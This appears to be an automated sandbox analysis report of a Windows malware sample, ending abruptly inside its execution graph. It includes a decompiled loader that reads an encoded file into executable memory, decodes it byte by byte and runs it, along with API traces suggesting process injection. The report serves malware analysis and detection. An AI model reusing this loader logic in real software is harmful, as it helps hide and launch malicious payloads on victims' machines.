                                  callgraph 0 Function_027210B0 1 Function_02720776 0->1 2 Function_027201B6 0->2 7 Function_02720267 0->7 9 Function_02720368 0->9 23 Function_027206C7 0->23 6 Function_027206A2 1->6 12 Function_02720192 2->12 19 Function_02720402 2->19 22 Function_02720706 2->22 25 Function_02720005 2->25 3 Function_02720A3A 4 Function_027203FD 5 Function_0272013D 7->19 21 Function_02720180 7->21 7->22 7->25 8 Function_027201A4 8->4 8->19 9->8 9->19 9->22 9->25 10 Function_009C1000 11 Function_0272012C 12->4 12->19 13 Function_02720110 17 Function_0272011F 13->17 14 Function_02720616 14->1 15 Function_027200D4 16 Function_027206DB 18 Function_027207DD 18->1 18->23 26 Function_02720D88 18->26 19->1 19->16 24 Function_02720744 19->24 20 Function_02720002 20->5 20->15 21->4 21->19 22->1 24->14 25->5 25->15 26->0 26->1 26->2 26->7 26->23

                                  Executed Functions

                                  Function 02720402 Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 027204DC
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 02720506
                                  • ReadFile.KERNELBASE(00000000,00000000,02720248,?,00000000), ref: 0272051D
                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0272053F
                                  • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,0272019C,7FDFFF66), ref: 027205B2
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 027205BD
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0272019C), ref: 02720608
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                  • String ID:
                                  • API String ID: 656311269-0
                                  • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                  • Instruction ID: f421f27db85c526b787e5dd216fde338ca4917792890e697746de33de49ea2ed
                                  • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                  • Instruction Fuzzy Hash: 59618F31E00225ABCF11DFA5C888BAEB7BAAF58750F148059E505EB390EB349E05CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 027210B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 027211F4
                                  • GetThreadContext.KERNELBASE(?,00010007), ref: 02721217
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: ContextCreateProcessThread
                                  • String ID: D
                                  • API String ID: 2843130473-2746444292
                                  • Opcode ID: 4e2022385cdea4111b9ac4083cea4c801fe6bd40164ecd4b511d94ae00eb2acb
                                  • Instruction ID: 30e4b49b3b6f7fa31fafd308b61d066721c10e1abdaa7679e4f7b3d5303e8594
                                  • Opcode Fuzzy Hash: 4e2022385cdea4111b9ac4083cea4c801fe6bd40164ecd4b511d94ae00eb2acb
                                  • Instruction Fuzzy Hash: 79A1B371E00129EFDF41DFA4C984BAEBBB6BF08344F504469E519EB261D731AA45CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009C1000 Relevance: 9.1, APIs: 6, Instructions: 95filememoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 112 9c1000-9c103a GetCommandLineW CommandLineToArgvW CreateFileW 113 9c1116-9c111c 112->113 114 9c1040-9c1072 GetFileSize VirtualAlloc ReadFile 112->114 114->113 115 9c1078-9c107a 114->115 116 9c1080 115->116 117 9c1111 115->117 118 9c1082-9c110b 116->118 117->113 118->117 118->118
                                  C-Code - Quality: 100%
                                  			_entry_() {
				int _v16;
				struct _OVERLAPPED* _v20;
				long _v28;
				void* _t48;
				long _t49;
				void* _t50;
				void* _t51;
				long _t77;
				void** _t78;

				_v20 = 0;
				_t48 = CreateFileW((CommandLineToArgvW(GetCommandLineW(),  &_v16))[1], 0x80000000, 1, 0, 3, 0x80, 0); // executed
				if(_t48 != 0xffffffff) {
					_t49 = GetFileSize(_t48, 0);
					_t77 = _t49;
					_t50 = VirtualAlloc(0, _t49, 0x3000, 0x40); // executed
					 *_t78 = _t50;
					_t4 = _t77 - 1; // -1
					_t48 = ReadFile(_t48, _t50, _t4,  &_v28, 0); // executed
					if(_t48 != 0) {
						if(_t77 == 0) {
							L5:
							_t48 =  *_t78;
							goto __eax;
						}
						_t51 = 0;
						do {
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xb2;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x69;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xee;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xb5;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x50;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xa2;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) ^ 0x000000b8;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x88;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xa1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x13;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xcc;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x40;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xd8;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) ^ 0x00000006;
							_t51 = _t51 + 1;
						} while (_t77 != _t51);
						goto L5;
					}
				}
				return _t48;
			}












                                  0x009c1008
                                  0x009c1031
                                  0x009c103a
                                  0x009c1044
                                  0x009c104a
                                  0x009c1055
                                  0x009c105b
                                  0x009c105e
                                  0x009c106a
                                  0x009c1072
                                  0x009c107a
                                  0x009c1111
                                  0x009c1111
                                  0x009c1114
                                  0x009c1114
                                  0x009c1080
                                  0x009c1082
                                  0x009c1085
                                  0x009c108c
                                  0x009c1092
                                  0x009c1098
                                  0x009c109f
                                  0x009c10a6
                                  0x009c10ac
                                  0x009c10b3
                                  0x009c10ba
                                  0x009c10c0
                                  0x009c10c7
                                  0x009c10ce
                                  0x009c10d5
                                  0x009c10dc
                                  0x009c10e2
                                  0x009c10e9
                                  0x009c10f0
                                  0x009c10f6
                                  0x009c10fd
                                  0x009c1104
                                  0x009c1108
                                  0x009c1109
                                  0x00000000
                                  0x009c1082
                                  0x009c1072
                                  0x009c111c

                                  APIs
                                  • GetCommandLineW.KERNEL32 ref: 009C100C
                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 009C1018
                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 009C1031
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 009C1044
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 009C1055
                                  • ReadFile.KERNELBASE(00000000,00000000,-00000001,?,00000000), ref: 009C106A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.255847842.00000000009C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009C0000, based on PE: true
                                  • Associated: 00000002.00000002.255842628.00000000009C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000002.00000002.255864838.00000000009C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_9c0000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: File$CommandLine$AllocArgvCreateReadSizeVirtual
                                  • String ID:
                                  • API String ID: 4005432831-0
                                  • Opcode ID: e2e8c65b62e20bc440d5b6d00bad9f5e5b00ee7004caba8489a4a99600fe35d7
                                  • Instruction ID: f9d0860f3cc0db14978248b594a98d6a2eba75d40f9ec466966746852efbc90d
                                  • Opcode Fuzzy Hash: e2e8c65b62e20bc440d5b6d00bad9f5e5b00ee7004caba8489a4a99600fe35d7
                                  • Instruction Fuzzy Hash: 6A31453060C2819FD326EB24CCA4E39BBA9EF97714F15468CE1D25B6D2C7665C03D722
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 027207DD Relevance: 7.7, APIs: 5, Instructions: 207fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 027209B3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 8d088e97d6171234cc6b2f606b12580658963d4f4dc01f51948f3c4c2c5ed85d
                                  • Instruction ID: 828a1cc69b76e1584563beaaae05615691f8c957e4192f3181395cd9b8fc8d2e
                                  • Opcode Fuzzy Hash: 8d088e97d6171234cc6b2f606b12580658963d4f4dc01f51948f3c4c2c5ed85d
                                  • Instruction Fuzzy Hash: 4E714835E50348EADF60DBE4E855BEEB7B5AF48710F20441AE608FA2A0E7700A45DF15
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 02720616 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 2720616-272064f GetPEB call 2720776 299 2720651-2720654 294->299 300 2720656-272065e 294->300 301 272069b-27206a1 299->301 303 2720660-2720662 300->303 304 2720699 300->304 305 2720669-2720677 303->305 304->301 306 2720679 305->306 307 272067c-2720683 305->307 306->307 308 2720685 307->308 309 2720688-272068b 307->309 308->309 309->299 310 272068d-2720697 309->310 310->304 310->305
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                  • Instruction ID: c976b76bca5363a07e6e3b76b27dda154bae45f9d185d3526580a5162b2ce1ad
                                  • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                  • Instruction Fuzzy Hash: 9011C271A00129AFDB209BAAC8889AEF7FEEF95694B5440A9F805D3314E774DE44C670
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02720706 Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                  • Instruction ID: 1aa3441db157a641251c5010ccaff08704ee3846abfc524306b408dd7746fd7a
                                  • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                  • Instruction Fuzzy Hash: 9EE01A3576465A9FCB54CBA8C985D65B3F8EB29360B144294F819C73A0EB34EE04DAA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02720744 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                  • Instruction ID: 933d62f6c42a2edd7b31421d5fded05a711e9bef559c4b19dced2c09e9c0547e
                                  • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                  • Instruction Fuzzy Hash: 05E0863A3105218BC721DA19D584952F3E9FBA82B07154469EC4AD3711C330FC04CE60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 027206C7 Relevance: .0, Instructions: 7COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:4.2%
                                  Dynamic/Decrypted Code Coverage:2.7%
                                  Signature Coverage:5.8%
                                  Total number of Nodes:584
                                  Total number of Limit Nodes:70
                                  execution_graph 32700 41d4b0 32701 41d4bb 32700->32701 32703 419bf0 32700->32703 32704 419c16 32703->32704 32715 408b60 32704->32715 32706 419c22 32714 419c69 32706->32714 32723 40d170 32706->32723 32708 419c37 32711 419c4c 32708->32711 32771 418930 32708->32771 32735 40a610 32711->32735 32712 419c5b 32713 418930 2 API calls 32712->32713 32713->32714 32714->32701 32716 408b6d 32715->32716 32774 408ab0 32715->32774 32718 408b74 32716->32718 32786 408a50 32716->32786 32718->32706 32724 40d19c 32723->32724 33204 40a010 32724->33204 32726 40d1ae 33208 40d080 32726->33208 32729 40d1c9 32732 418710 2 API calls 32729->32732 32733 40d1d4 32729->32733 32730 40d1f2 32730->32708 32731 40d1e1 32731->32730 32734 418710 2 API calls 32731->32734 32732->32733 32733->32708 32734->32730 32736 40a635 32735->32736 32737 40a010 LdrLoadDll 32736->32737 32738 40a68c 32737->32738 33228 409c90 32738->33228 32740 40a903 32740->32712 32741 40a6b2 32741->32740 33237 4133a0 32741->33237 32743 40a6f7 32743->32740 33240 4079d0 32743->33240 32745 40a73b 32745->32740 33247 418780 32745->33247 32749 40a791 32750 40a798 32749->32750 33259 418290 32749->33259 32752 41a0a0 2 API calls 32750->32752 32754 40a7a5 32752->32754 32754->32712 32755 40a7e2 32756 41a0a0 2 API calls 32755->32756 32757 40a7e9 32756->32757 32757->32712 32758 40a7f2 32759 40d200 3 API calls 32758->32759 32760 40a866 32759->32760 32760->32750 32761 40a871 32760->32761 32762 41a0a0 2 API calls 32761->32762 32763 40a895 32762->32763 33264 4182e0 32763->33264 32766 418290 2 API calls 32767 40a8d0 32766->32767 32767->32740 33269 4180a0 32767->33269 32770 418930 2 API calls 32770->32740 32772 41894f ExitProcess 32771->32772 32773 4191e0 LdrLoadDll 32771->32773 32773->32772 32775 408ac3 32774->32775 32825 416e50 LdrLoadDll 32774->32825 32805 416d00 32775->32805 32778 408acc 32779 408ad6 32778->32779 32808 419530 32778->32808 32779->32716 32781 408b13 32781->32779 32819 4088d0 32781->32819 32783 408b33 32826 408320 LdrLoadDll 32783->32826 32785 408b45 32785->32716 32787 408a6a 32786->32787 32788 419820 LdrLoadDll 32786->32788 33178 419820 32787->33178 32788->32787 32791 419820 LdrLoadDll 32792 408a91 32791->32792 32793 40cf70 32792->32793 32794 40cf89 32793->32794 33186 409e90 32794->33186 32796 40cf9c 33190 418460 32796->33190 32800 40cfc2 32801 40cfed 32800->32801 33197 4184e0 32800->33197 32803 418710 2 API calls 32801->32803 32804 408b85 32803->32804 32804->32706 32827 418880 32805->32827 32809 419549 32808->32809 32840 413a50 32809->32840 32811 419561 32812 41956a 32811->32812 32879 419370 32811->32879 32812->32781 32814 41957e 32814->32812 32897 418180 32814->32897 32822 4088ea 32819->32822 33156 406e20 32819->33156 32821 4088f1 32821->32783 32822->32821 33169 4070e0 32822->33169 32825->32775 32826->32785 32828 416d15 32827->32828 32830 4191e0 32827->32830 32828->32778 32831 4191f0 32830->32831 32833 419212 32830->32833 32834 413e50 32831->32834 32833->32828 32835 413e5e 32834->32835 32836 413e6a 32834->32836 32835->32836 32839 4142d0 LdrLoadDll 32835->32839 32836->32833 32838 413fbc 32838->32833 32839->32838 32841 413d85 32840->32841 32851 413a64 32840->32851 32841->32811 32844 413b90 32908 4185e0 32844->32908 32845 413b73 32965 4186e0 LdrLoadDll 32845->32965 32848 413b7d 32848->32811 32849 413bb7 32850 41a0a0 2 API calls 32849->32850 32853 413bc3 32850->32853 32851->32841 32905 417ed0 32851->32905 32852 413d49 32855 418710 2 API calls 32852->32855 32853->32848 32853->32852 32854 413d5f 32853->32854 32859 413c52 32853->32859 32974 413790 LdrLoadDll NtReadFile NtClose 32854->32974 32856 413d50 32855->32856 32856->32811 32858 413d72 32858->32811 32860 413cb9 32859->32860 32862 413c61 32859->32862 32860->32852 32861 413ccc 32860->32861 32967 418560 32861->32967 32864 413c66 32862->32864 32865 413c7a 32862->32865 32966 413650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32864->32966 32868 413c97 32865->32868 32869 413c7f 32865->32869 32868->32856 32923 413410 32868->32923 32911 4136f0 32869->32911 32871 413c70 32871->32811 32873 413c8d 32873->32811 32875 413d2c 32971 418710 32875->32971 32876 413caf 32876->32811 32878 413d38 32878->32811 32881 419381 32879->32881 32880 419393 32880->32814 32881->32880 32993 41a020 32881->32993 32883 4193b4 32996 413060 32883->32996 32885 419400 32885->32814 32886 4193d7 32886->32885 32887 413060 3 API calls 32886->32887 32890 4193f9 32887->32890 32889 41948a 32891 41949a 32889->32891 33122 419180 LdrLoadDll 32889->33122 32890->32885 33028 414390 32890->33028 33038 418ff0 32891->33038 32894 4194c8 33117 418140 32894->33117 32898 4191e0 LdrLoadDll 32897->32898 32899 41819c 32898->32899 33150 12e967a 32899->33150 32900 4181b7 32902 41a0a0 32900->32902 33153 4188f0 32902->33153 32904 4195d9 32904->32781 32906 4191e0 LdrLoadDll 32905->32906 32907 413b44 32906->32907 32907->32844 32907->32845 32907->32848 32909 4191e0 LdrLoadDll 32908->32909 32910 4185fc NtCreateFile 32909->32910 32910->32849 32912 41370c 32911->32912 32913 418560 LdrLoadDll 32912->32913 32914 41372d 32913->32914 32915 413734 32914->32915 32916 413748 32914->32916 32918 418710 2 API calls 32915->32918 32917 418710 2 API calls 32916->32917 32919 413751 32917->32919 32920 41373d 32918->32920 32975 41a2b0 LdrLoadDll RtlAllocateHeap 32919->32975 32920->32873 32922 41375c 32922->32873 32924 41345b 32923->32924 32925 41348e 32923->32925 32927 418560 LdrLoadDll 32924->32927 32926 4135d9 32925->32926 32931 4134aa 32925->32931 32928 418560 LdrLoadDll 32926->32928 32929 413476 32927->32929 32935 4135f4 32928->32935 32930 418710 2 API calls 32929->32930 32932 41347f 32930->32932 32933 418560 LdrLoadDll 32931->32933 32932->32876 32934 4134c5 32933->32934 32937 4134e1 32934->32937 32938 4134cc 32934->32938 32989 4185a0 LdrLoadDll 32935->32989 32941 4134e6 32937->32941 32942 4134fc 32937->32942 32940 418710 2 API calls 32938->32940 32939 41362e 32943 418710 2 API calls 32939->32943 32944 4134d5 32940->32944 32945 418710 2 API calls 32941->32945 32948 413501 32942->32948 32976 41a270 32942->32976 32946 413639 32943->32946 32944->32876 32947 4134ef 32945->32947 32946->32876 32947->32876 32952 413513 32948->32952 32979 418690 32948->32979 32952->32876 32953 41357e 32954 413585 32953->32954 32955 41359a 32953->32955 32957 418710 2 API calls 32954->32957 32958 418710 2 API calls 32955->32958 32957->32952 32959 4135a3 32958->32959 32960 4135cf 32959->32960 32983 419e70 32959->32983 32960->32876 32962 4135ba 32963 41a0a0 2 API calls 32962->32963 32964 4135c3 32963->32964 32964->32876 32965->32848 32966->32871 32968 413d14 32967->32968 32969 4191e0 LdrLoadDll 32967->32969 32970 4185a0 LdrLoadDll 32968->32970 32969->32968 32970->32875 32972 4191e0 LdrLoadDll 32971->32972 32973 41872c NtClose 32972->32973 32973->32878 32974->32858 32975->32922 32978 41a288 32976->32978 32990 4188b0 32976->32990 32978->32948 32980 4186ac NtReadFile 32979->32980 32981 4191e0 LdrLoadDll 32979->32981 32982 413567 32980->32982 32981->32980 32982->32953 32988 418520 LdrLoadDll 32982->32988 32984 419e94 32983->32984 32985 419e7d 32983->32985 32984->32962 32985->32984 32986 41a270 2 API calls 32985->32986 32987 419eab 32986->32987 32987->32962 32988->32953 32989->32939 32991 4191e0 LdrLoadDll 32990->32991 32992 4188cc RtlAllocateHeap 32991->32992 32992->32978 32994 41a04d 32993->32994 33123 4187c0 32993->33123 32994->32883 32997 413071 32996->32997 32999 413079 32996->32999 32997->32886 32998 41334c 32998->32886 32999->32998 33126 41b250 32999->33126 33001 4130cd 33002 41b250 2 API calls 33001->33002 33005 4130d8 33002->33005 33003 413126 33006 41b250 2 API calls 33003->33006 33005->33003 33007 41b380 3 API calls 33005->33007 33137 41b2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33005->33137 33009 41313a 33006->33009 33007->33005 33008 413197 33010 41b250 2 API calls 33008->33010 33009->33008 33131 41b380 33009->33131 33012 4131ad 33010->33012 33013 4131ea 33012->33013 33015 41b380 3 API calls 33012->33015 33014 41b250 2 API calls 33013->33014 33016 4131f5 33014->33016 33015->33012 33017 41b380 3 API calls 33016->33017 33023 41322f 33016->33023 33017->33016 33019 413324 33139 41b2b0 LdrLoadDll RtlFreeHeap 33019->33139 33021 41332e 33140 41b2b0 LdrLoadDll RtlFreeHeap 33021->33140 33138 41b2b0 LdrLoadDll RtlFreeHeap 33023->33138 33024 413338 33141 41b2b0 LdrLoadDll RtlFreeHeap 33024->33141 33026 413342 33142 41b2b0 LdrLoadDll RtlFreeHeap 33026->33142 33029 4143a1 33028->33029 33030 413a50 8 API calls 33029->33030 33031 4143b7 33030->33031 33032 4143f2 33031->33032 33033 414405 33031->33033 33037 41440a 33031->33037 33034 41a0a0 2 API calls 33032->33034 33035 41a0a0 2 API calls 33033->33035 33036 4143f7 33034->33036 33035->33037 33036->32889 33037->32889 33143 418eb0 33038->33143 33040 419004 33041 418eb0 LdrLoadDll 33040->33041 33042 41900d 33041->33042 33043 418eb0 LdrLoadDll 33042->33043 33044 419016 33043->33044 33045 418eb0 LdrLoadDll 33044->33045 33046 41901f 33045->33046 33047 418eb0 LdrLoadDll 33046->33047 33048 419028 33047->33048 33049 418eb0 LdrLoadDll 33048->33049 33050 419031 33049->33050 33051 418eb0 LdrLoadDll 33050->33051 33052 41903d 33051->33052 33053 418eb0 LdrLoadDll 33052->33053 33054 419046 33053->33054 33055 418eb0 LdrLoadDll 33054->33055 33056 41904f 33055->33056 33057 418eb0 LdrLoadDll 33056->33057 33058 419058 33057->33058 33059 418eb0 LdrLoadDll 33058->33059 33060 419061 33059->33060 33061 418eb0 LdrLoadDll 33060->33061 33062 41906a 33061->33062 33063 418eb0 LdrLoadDll 33062->33063 33064 419076 33063->33064 33065 418eb0 LdrLoadDll 33064->33065 33066 41907f 33065->33066 33067 418eb0 LdrLoadDll 33066->33067 33068 419088 33067->33068 33069 418eb0 LdrLoadDll 33068->33069 33070 419091 33069->33070 33071 418eb0 LdrLoadDll 33070->33071 33072 41909a 33071->33072 33073 418eb0 LdrLoadDll 33072->33073 33074 4190a3 33073->33074 33075 418eb0 LdrLoadDll 33074->33075 33076 4190af 33075->33076 33077 418eb0 LdrLoadDll 33076->33077 33078 4190b8 33077->33078 33079 418eb0 LdrLoadDll 33078->33079 33080 4190c1 33079->33080 33081 418eb0 LdrLoadDll 33080->33081 33082 4190ca 33081->33082 33083 418eb0 LdrLoadDll 33082->33083 33084 4190d3 33083->33084 33085 418eb0 LdrLoadDll 33084->33085 33086 4190dc 33085->33086 33087 418eb0 LdrLoadDll 33086->33087 33088 4190e8 33087->33088 33089 418eb0 LdrLoadDll 33088->33089 33090 4190f1 33089->33090 33091 418eb0 LdrLoadDll 33090->33091 33092 4190fa 33091->33092 33093 418eb0 LdrLoadDll 33092->33093 33094 419103 33093->33094 33095 418eb0 LdrLoadDll 33094->33095 33096 41910c 33095->33096 33097 418eb0 LdrLoadDll 33096->33097 33098 419115 33097->33098 33099 418eb0 LdrLoadDll 33098->33099 33100 419121 33099->33100 33101 418eb0 LdrLoadDll 33100->33101 33102 41912a 33101->33102 33103 418eb0 LdrLoadDll 33102->33103 33104 419133 33103->33104 33105 418eb0 LdrLoadDll 33104->33105 33106 41913c 33105->33106 33107 418eb0 LdrLoadDll 33106->33107 33108 419145 33107->33108 33109 418eb0 LdrLoadDll 33108->33109 33110 41914e 33109->33110 33111 418eb0 LdrLoadDll 33110->33111 33112 41915a 33111->33112 33113 418eb0 LdrLoadDll 33112->33113 33114 419163 33113->33114 33115 418eb0 LdrLoadDll 33114->33115 33116 41916c 33115->33116 33116->32894 33118 4191e0 LdrLoadDll 33117->33118 33119 41815c 33118->33119 33149 12e9860 LdrInitializeThunk 33119->33149 33120 418173 33120->32814 33122->32891 33124 4191e0 LdrLoadDll 33123->33124 33125 4187dc NtAllocateVirtualMemory 33124->33125 33125->32994 33127 41b260 33126->33127 33128 41b266 33126->33128 33127->33001 33129 41a270 2 API calls 33128->33129 33130 41b28c 33129->33130 33130->33001 33132 41b2f0 33131->33132 33133 41b34d 33132->33133 33134 41a270 2 API calls 33132->33134 33133->33009 33135 41b32a 33134->33135 33136 41a0a0 2 API calls 33135->33136 33136->33133 33137->33005 33138->33019 33139->33021 33140->33024 33141->33026 33142->32998 33144 418ecb 33143->33144 33145 413e50 LdrLoadDll 33144->33145 33146 418eeb 33145->33146 33147 413e50 LdrLoadDll 33146->33147 33148 418f97 33146->33148 33147->33148 33148->33040 33148->33148 33149->33120 33151 12e968f LdrInitializeThunk 33150->33151 33152 12e9681 33150->33152 33151->32900 33152->32900 33154 41890c RtlFreeHeap 33153->33154 33155 4191e0 LdrLoadDll 33153->33155 33154->32904 33155->33154 33157 406e30 33156->33157 33158 406e2b 33156->33158 33159 41a020 2 API calls 33157->33159 33158->32822 33166 406e55 33159->33166 33160 406eb8 33160->32822 33161 418140 2 API calls 33161->33166 33162 406ebe 33163 406ee4 33162->33163 33165 418840 2 API calls 33162->33165 33163->32822 33167 406ed5 33165->33167 33166->33160 33166->33161 33166->33162 33168 41a020 2 API calls 33166->33168 33172 418840 33166->33172 33167->32822 33168->33166 33170 4070fe 33169->33170 33171 418840 2 API calls 33169->33171 33170->32783 33171->33170 33173 4191e0 LdrLoadDll 33172->33173 33174 41885c 33173->33174 33177 12e96e0 LdrInitializeThunk 33174->33177 33175 418873 33175->33166 33177->33175 33179 419843 33178->33179 33182 409b40 33179->33182 33183 409b64 33182->33183 33184 409ba0 LdrLoadDll 33183->33184 33185 408a7b 33183->33185 33184->33185 33185->32791 33188 409eb3 33186->33188 33187 409f30 33187->32796 33188->33187 33202 417f10 LdrLoadDll 33188->33202 33191 4191e0 LdrLoadDll 33190->33191 33192 40cfab 33191->33192 33192->32804 33193 418a50 33192->33193 33194 418a6f LookupPrivilegeValueW 33193->33194 33195 4191e0 LdrLoadDll 33193->33195 33194->32800 33195->33194 33198 4191e0 LdrLoadDll 33197->33198 33199 4184fc 33198->33199 33203 12e9910 LdrInitializeThunk 33199->33203 33200 41851b 33200->32801 33202->33187 33203->33200 33205 40a037 33204->33205 33206 409e90 LdrLoadDll 33205->33206 33207 40a066 33206->33207 33207->32726 33209 40d09a 33208->33209 33217 40d150 33208->33217 33210 409e90 LdrLoadDll 33209->33210 33211 40d0bc 33210->33211 33218 4181c0 33211->33218 33213 40d0fe 33221 418200 33213->33221 33216 418710 2 API calls 33216->33217 33217->32729 33217->32731 33219 4191e0 LdrLoadDll 33218->33219 33220 4181dc 33219->33220 33220->33213 33222 418216 33221->33222 33223 4191e0 LdrLoadDll 33222->33223 33224 41821c 33223->33224 33227 